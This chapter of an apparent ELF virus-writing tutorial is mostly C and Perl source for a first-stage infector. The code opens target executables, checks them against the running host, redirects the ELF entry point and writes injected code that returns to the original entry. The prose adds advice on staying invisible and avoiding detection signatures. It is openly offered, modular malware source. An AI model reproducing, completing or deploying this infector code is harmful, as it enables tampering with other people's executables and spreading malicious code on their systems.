To take a significant step forward, you must make a series of finite improvements. | |
Donald J. Atwood, General Motors |
This chapter introduces the framework of a first stage infector written in plain C. The program will insert and activate one chunk of code into executables specified on the command line. It is not insertable itself.
The code is split it into many parts that manipulate a central data structure. The idea is to replace some of these parts in later chapters to implement improvements and different infection methods. Parts are shown in random order and without any #include statements or prototypes. Identifiers prefixed with TEVWH_ are defined in generated file config.h. See Verifying installed packages. If you need full details a look into the sources of this document should do. Mirrors shows where to get it.
This script is used throughout the document to convert binary files into valid C code, i.e. definition of a byte array. This could have been a small filter written in perl(1), but we actually need a lot of features.
We need to process the output of both ndisasm and objdump, on multiple platforms. Examples for valid input (i386, sparc, alpha):
08048080 6A04 push byte +0x4
10074: 82 10 20 04 mov 4, %g1
1200000b0: 02 00 bb 27 ldah gp,2(t12) |
The __attribute__ clause is explained in A section called .text.
Initializing the array with string literals (looking like \xDE\xAD\xBE\xEF) is easier. The terminating zero would not work with Doing it in C, however. But then using a list of hexadecimal numbers introduces separating comas, requiring special treatment of the last line.
If command line option -last_line_is_ofs is passed to the program then the last line of disassembly is meant to specify a offset into the code. Actually it's just the last byte of that line. You are free to use any dummy operation, see the example input above. A real world example is at Infection #1. The last instruction itself is not emitted to the byte array. Instead enum constant ENTRY_POINT_OFS is defined.
Source: src/platform/disasm.pl
#!/usr/bin/perl -sw
use strict;
my $LINE = " %-30s /* %-32s */\n";
$::identfier = 'main' if (!defined($::identfier));
$::size = '' if (!defined($::size));
$::align = '8' if (!defined($::align));
$::section = '.text' if (!defined($::section));
printf "const unsigned char %s[%s]\n", $::identfier, $::size;
print "__attribute__ (( aligned($::align), section(\"$::section\") )) =\n";
print "{\n";
my $code_size = 0;
my @line;
while(<>)
{
s/^\s+//; # trim leading white space
s/\s+$//; # trim trailing white space
s/\s+[!;].*//; # trim trailing comments
my $addr = (split(/[:\s]+/))[0];
s/[A-Fa-f0-9]+:?\s+//;
my @code = split(/\s\s+/);
my $code = $code[0];
$code =~ s/\s//g; # make objdump look like ndisasm
$code_size += length($code) / 2;
my $dump = '0x' . substr($code, 0, 2);
for(my $i = 2; $i < length($code); $i += 2)
{
$dump .= ',0x' . substr($code, $i, 2);
}
push @line, [ $addr . ': ' . join(' ', @code[1..$#code]), $code, $dump ]
}
my $nr = 0;
my $max = $#line;
$max -= 1 if (defined($::last_line_is_ofs));
while($nr < $max)
{
printf $LINE, $line[$nr][2] . ',', $line[$nr][0];
$nr++;
}
printf $LINE, $line[$nr][2], $line[$nr][0];
printf "}; /* %d bytes (%#x) */\n", $code_size, $code_size;
if (defined($::last_line_is_ofs))
{
my $ofs = substr($line[$nr + 1][1], -2, 2);
printf "enum { ENTRY_POINT_OFS = 0x%x };\n", hex($ofs);
} |
Source: src/one_step_closer/target.h
#ifdef NDEBUG
#define TRACE (void)
#else
#define TRACE fprintf
#endif
#define QUOTE_EXP(n) #n
#define QUOTE_NUM(n) QUOTE_EXP(n)
#define TRACE_CHECK(l, r, op) \
TRACE(stderr, __FILE__ ":" QUOTE_NUM(__LINE__) " " \
QUOTE_EXP(l) op QUOTE_EXP(r) "\n")
#define CHECK_EQ(l, r) \
if ((l) != (r)) { TRACE_CHECK((l), (r), "!="); return false; }
#define CHECK_LT(l, r) \
if ((l) >= (r)) { TRACE_CHECK((l), (r), ">="); return false; }
/* align up to multiple of 16, will take at most 15 bytes */
#define ALIGN_UP(n) (((n) + 15) & ~15)
typedef enum { false, true } bool;
#define SELF ((TEVWH_ELF_EHDR*)TEVWH_ELF_BASE)
extern const unsigned char infection[];
typedef struct
{
int fd_dst; /* opened write-only */
int fd_src; /* opened read-only */
off_t filesize;
unsigned aligned_filesize;
/* start of memory-mapped image, b means byte */
union { void* v; unsigned char* b; TEVWH_ELF_EHDR* ehdr; } p;
/* offset to first program header (in file) */
TEVWH_ELF_PHDR* phdr;
/* offset to first byte after code segment (in file) */
unsigned end_of_cs;
unsigned aligned_end_of_cs;
unsigned char* target_entry_code;
/* start of host code (in memory) */
unsigned original_entry;
} Target; |
Source: src/one_step_closer/main.inc
int main(int argc, char** argv)
{
char** pp = argv;
const char* p;
int rc = argc - 1;
while(0 != (p = *++pp))
{
Target t;
fprintf(stderr, "Infecting copy of %s... ", p);
if (!target_open(&t, p))
continue;
if (target_is_suitable(&t) &&
target_patch_entry_addr(&t) &&
target_patch_phdr(&t) &&
target_patch_shdr(&t) &&
target_copy_and_infect(&t)
)
{
fprintf(stderr, "Ok\n");
rc--;
}
target_close(&t);
}
fprintf(stderr, "%d infected, %d failed\n", argc - rc - 1, rc);
return rc;
} |
Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between first and final modification contents of the target is invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted through a power failure (or emergency shutdown of a hectic admin).
There are a few approaches to change a file while copying.
Use lseek(2), read(2) and write(2) to load pieces of the source into memory, patch them, and write them to destination. A lot of work. Can be really inefficient.
Use read(2) to get the whole source file in one go. Requires more memory. But then even the largest executable files have only a few MB.
Use mmap(2). In my humble opinion obviously the best way.
Source: src/one_step_closer/open.inc
bool target_open(Target* t, const char* src_filename)
{
static const char suffix[] = "_infected";
const char* base;
size_t len;
char* dst_filename;
TRACE(stderr, "target_open(%s)\n", src_filename);
base = strrchr(src_filename, '/');
base = (base == 0) ? src_filename : base + 1;
len = strlen(base);
dst_filename = malloc(len + sizeof(suffix));
if (dst_filename == 0)
{
TRACE(stderr, "Out of memory allocating %d bytes.\n",
len + sizeof(suffix));
return false;
}
memcpy(dst_filename, base, len);
memcpy(dst_filename + len, suffix, sizeof(suffix));
t->fd_src = open(src_filename, O_RDONLY);
if (t->fd_src >= 0)
{
t->filesize = lseek(t->fd_src, 0, SEEK_END);
if ((off_t)-1 != t->filesize)
{
t->aligned_filesize = ALIGN_UP(t->filesize);
t->p.v = mmap(0, t->filesize, PROT_READ | PROT_WRITE,
MAP_PRIVATE, t->fd_src, 0);
if (MAP_FAILED != t->p.v)
{
t->fd_dst = open(dst_filename, O_WRONLY | O_CREAT | O_TRUNC, 0775);
if (t->fd_dst >= 0)
{
free(dst_filename);
return true;
}
perror("open");
}
else
perror("mmap");
}
else
perror("lseek");
}
else
perror("open");
free(dst_filename);
return false;
} |
Source: src/one_step_closer/close.inc
void target_close(Target* t)
{
TRACE(stderr, "target_close\n");
if (t->p.v != 0)
munmap(t->p.v, t->filesize);
close(t->fd_src);
close(t->fd_dst);
} |
A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you even think about polymorphism and stealth mechanisms you should go sure your code does nothing unexpected. On the other hand exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus.
Finding a meaningful set of tests is an art in it itself. For example some executables of Red Hat 8.0 have an additional program header of type GNU_EH_FRAME. This means that e_phnum can differ between infector and target.
Source: src/one_step_closer/suitable.inc
bool target_is_suitable(Target* t)
{
enum { CMP_SIZE = offsetof(TEVWH_ELF_EHDR, e_entry) };
TEVWH_ELF_PHDR* self_phdr;
TEVWH_ELF_PHDR* phdr;
TEVWH_ELF_EHDR* ehdr;
TRACE(stderr, "target_is_suitable: SELF=%p\n", SELF);
self_phdr = (TEVWH_ELF_PHDR*)((char*)SELF + SELF->e_phoff);
phdr = t->phdr = (TEVWH_ELF_PHDR*)(t->p.b + t->p.ehdr->e_phoff);
ehdr = t->p.ehdr;
CHECK_EQ(memcmp(&ehdr->e_ident, &SELF->e_ident, CMP_SIZE), 0);
CHECK_EQ(ehdr->e_phoff, SELF->e_phoff);
CHECK_EQ(ehdr->e_ehsize, SELF->e_ehsize);
CHECK_EQ(ehdr->e_phentsize, SELF->e_phentsize);
CHECK_EQ(ehdr->e_shentsize, SELF->e_shentsize);
/* the type of these headers must be PT_LOAD */
CHECK_EQ(phdr[2].p_type, self_phdr[2].p_type);
CHECK_EQ(phdr[3].p_type, self_phdr[3].p_type);
/* a code segment with trailing 0-bytes makes no sense, anyway */
CHECK_EQ(phdr[2].p_filesz, phdr[2].p_memsz);
t->end_of_cs = phdr[2].p_offset + phdr[2].p_filesz;
t->aligned_end_of_cs = ALIGN_UP(t->end_of_cs);
t->target_entry_code = t->p.b + (t->p.ehdr->e_entry - TEVWH_ELF_BASE);
return true;
} |
This function is independent from the chosen infection method. The directory name e1 means that this is the first (orthogonal) implementation. Anyway, without this function the behavior of the target is not modified. If the infection methods prevents double infection by design, this can be used for vaccination in the true meaning of the word: Infection with a deactivated mutation makes the target immune against less friendly attackers.
Source: src/one_step_closer/e1/patch_entry_addr.inc
bool target_patch_entry_addr(Target* t)
{
TRACE(stderr, "target_patch_entry_addr\n");
t->original_entry = t->p.ehdr->e_entry;
t->p.ehdr->e_entry = target_new_entry_addr(t);
TRACE(stderr, "e_entry=%08x\n", t->p.ehdr->e_entry);
return true; /* this implementation can't fail */
} |
infection is an array of bytes generated by Dressing up binary code. Constant ENTRY_POINT_OFS points to the location inside this array to patch with the original entry address.
Source: src/one_step_closer/write_infection.inc
unsigned target_write_infection(Target* t)
{
enum { ADDR_SIZE = sizeof(((Target*)0)->original_entry) };
enum { REST_OFS = ENTRY_POINT_OFS + ADDR_SIZE };
TRACE(stderr, "target_write_infection ENTRY_POINT_OFS=%d\n",
ENTRY_POINT_OFS);
/* i386: first byte is the opcode for "push" */
write(t->fd_dst, infection, ENTRY_POINT_OFS);
/* i386: next four bytes is the address to "ret" to */
write(t->fd_dst, &t->original_entry, sizeof(t->original_entry));
/* rest of infective code */
write(t->fd_dst, infection + REST_OFS, sizeof(infection) - REST_OFS);
return sizeof(infection);
} |